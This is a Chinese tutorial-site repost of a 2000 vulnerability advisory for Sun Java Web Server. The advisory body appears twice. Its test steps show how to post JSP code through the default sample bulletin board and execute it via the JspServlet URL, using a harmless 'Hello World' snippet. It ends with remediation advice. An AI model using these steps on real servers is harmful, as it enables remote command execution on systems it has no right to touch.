最新下载
热门教程
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
Sun Java Web服务器远程可执行命令漏洞
时间:2022-07-02 17:30:45 编辑:袖梨 来源:一聚教程网
Sun Java Web服务器远程可执行命令漏洞
漏洞发布时间:2000-7-13 17:41:00
漏 洞 描 述:
在Solaris and Windows NT的Sun Java Web Server默认安装设置下。通过公告版的样板程序的漏洞,可以远程执行任意命令。
漏洞测试方法如下:
下面的例子将显示如何上载和执行该代码,而在服务器上显示"Hello World"。
输入下面的JSP代码将打印出"Hello World":
<% String s="Hello World"; %>
<%=s %>
通过下面的公告版连接Post这段代码:
http://jws.site/examples/applications/bboard/bboard_frames.html
检验是否该代码真正的上载了:
http://jws.site/board.html
通过执行下面的连接编译和执行该代码:
http://jws.site/servlet/com.sun.server.http.pagecompile.jsp.runtime.JspServlet/board.html
解 决 方 法:
仔细按照Java Web Server手册中的"How to secure a web site that uses the Java Web Server" 一章进行设置,或者参考下面连接:
http://www.sun.com/software/jwebserver/faq/jwsca-2000-02.html
或者简单的移除默认安装的这些样板文件。
漏洞发布时间:2000-7-13 17:41:00
漏 洞 描 述:
在Solaris and Windows NT的Sun Java Web Server默认安装设置下。通过公告版的样板程序的漏洞,可以远程执行任意命令。
漏洞测试方法如下:
下面的例子将显示如何上载和执行该代码,而在服务器上显示"Hello World"。
输入下面的JSP代码将打印出"Hello World":
<% String s="Hello World"; %>
<%=s %>
通过下面的公告版连接Post这段代码:
http://jws.site/examples/applications/bboard/bboard_frames.html
检验是否该代码真正的上载了:
http://jws.site/board.html
通过执行下面的连接编译和执行该代码:
http://jws.site/servlet/com.sun.server.http.pagecompile.jsp.runtime.JspServlet/board.html
解 决 方 法:
仔细按照Java Web Server手册中的"How to secure a web site that uses the Java Web Server" 一章进行设置,或者参考下面连接:
http://www.sun.com/software/jwebserver/faq/jwsca-2000-02.html
或者简单的移除默认安装的这些样板文件。
相关文章
- 云星穹铁道权益升级怎么玩 云崩铁权益升级活动介绍 12-03
- 以闪亮之名山中绘梦怎么玩 以闪亮之名滢然花梦套装活动介绍 12-03
- 以闪亮之名绿野梦歌礼包怎么样 以闪亮之名绿野梦歌拍照礼包介绍 12-03
- 光遇12.6有什么更新 光遇12月6日更新内容介绍 12-03
- 伍六七暗影交锋测试资格怎么获得 伍六七暗影交锋内测资格获取方法 12-03
- 无限暖暖晶莹诗集怎么样 12-03